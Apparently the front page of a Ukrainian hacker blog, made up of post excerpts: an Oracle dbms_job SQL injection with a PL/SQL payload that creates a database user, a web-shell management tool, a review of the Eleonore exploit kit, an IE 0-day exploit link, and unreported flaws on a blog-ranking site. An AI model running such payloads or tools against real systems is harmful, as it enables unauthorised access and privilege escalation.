Після невдалого rfi\lfi на одному з серверів AOL, шукав я де б знайти чогось відомого, ось и натрапив на редхат, а там швиденько знайшов скулю. blind sql-inj. Як виявилось, там ще у юзера і file_priv=y.
Не буду тягнуть кота за яйця:
Read more…
Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.
...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...
INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо комусь і буде потрібно. Але щоб довести справу до переможного кінця, знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.
...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...
Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.
CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/
Ну і власне сам експлойт (під катом):
Read more...
Писався софт достатньо давно, та і виключно в цілях ознайомлення 
Якщо чесно, то я вже навіть не пам’ятаю чи реалізував все що хотів, чи ні (хоча скоріше, що ні). Отже, дозвольте представити вам систему для роботи з великою кількістю веб-шеллів типу madshell.
Меню:
Думаю все інтуїтивно зрозуміло (:
В версії 1.2 система автоматично оприділяє такі параметри:
Стандартна пара логін-пароль: admin:pass
1 квітня стартувала спільна акція Skype і Приватбанка з розповсюдження безкоштовних ваучерів для поповнення рахунку популярного інтернет-телефону.
Протягом періоду дії акції з 01.04.10 по 08.04.10 кожен бажаючий зможе взяти участь відразу в двох конкурсах і гарантовано поповнити не тільки свій рахунок Skype, але і розіграти суми поповнення для своїх друзів.
Хочу надати вам інформацію про тестування зв’язки експлойтів Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти
Середній пробив характерний для звязки:
Ціни:
Як не дивно, та в системі присутні вразливості, далі про них.
Увечері в суботу 27 березня, близько 21:00 за київським часом на другому поверсі бізнес-центру “Фабрика Бізнесу” за адресою м. Одеса вул. Дальницька, 46, де знаходиться датацентр одного з найбільших на Україні хостинг-провайдерів HOSTING.UA почалася пожежа.
Встановлена в датацентрі система пожежогасіння з нез’ясованих причин не спрацювала. Сигнал від датчиків надійшов на пульт системи пожежогасіння, проте обладнання не спрацювало. З цієї причини замість належних для датацентрів безводних систем пожежогасіння на основі порошкових або газових сумішах, прибули пожежники використовували наявні в їхньому розпорядженні засоби, що збільшило збиток нанесений серверам у датацентрі. Вікна в датацентрі вибиті в ході заходів з пожежогасіння.
Серверам у ДЦ завдано великої шкоди. Співробітники датацентру не можуть у даний час оцінити його обсяг, хоча стверджують, що частина серверів вціліла. Наскільки це правда – не відомо. Є інформація, що навіть оцінка збитку зможе бути завершена не раніше ніж через тиждень. На поточний момент, вже більше 12 годин, клієнтам хостинг-провайдера до цих пір не надходить жодної офіційної інформації, що підтверджує припущення про значні масштаби збитку.
Фотографія з місця подій:
Нещодавно мною були виявленні численні вразливості на сайті top.blog.net.ua. В той же день про це була повідомлена адміністрація проекту, але, нажаль відповіді я так і не отримав. Сподіваюсь цей пост спонукає їх виправити вразливості. А тепер блище до справи.
UA TOP Bloggers визначає позиції сайту за такими показниками:
Розглянемо як система реєструє ці дані. Від нас вимагають встановити код кнопки на сайті. Логічно що через нього і проводиться підрахунок. Поглянемо на код:
Все зрозуміло – картинка генерується скриптом, якому передаються 2 параметри: in,id. Id це і є номер нашого сайту.
Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп’ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, Windows XP SP3
Подивитись вихідний код експлойту.
Експлойт запропонований Moshe Ben Abu (деобфускований та з видаленою malware начинкою):
У звязку з тим, що ESET NOD32 через код сплойту сповіщає що наш блог містить потенційно небезпечний контент – даємо лінк на код експлойту:
http://uasc.org.ua/files/ie6-7exploit.txt
Відео роботи експлойта:
Internet Explorer 0-day Attack from Panda Security on Vimeo.
готовий, зручний клас для роботи з антикапчою на шарпі.. клас і опис під катом =)
доречі, вітаю прекрасну половину людства з 8м березням )
Read more…
В журналі “][акер" #134 2010 р. вийшла моя стаття "GOV сайты под угрозой". Далі оригінал статті на російській мові.
GOV сайты под угрозой
Останні коментарі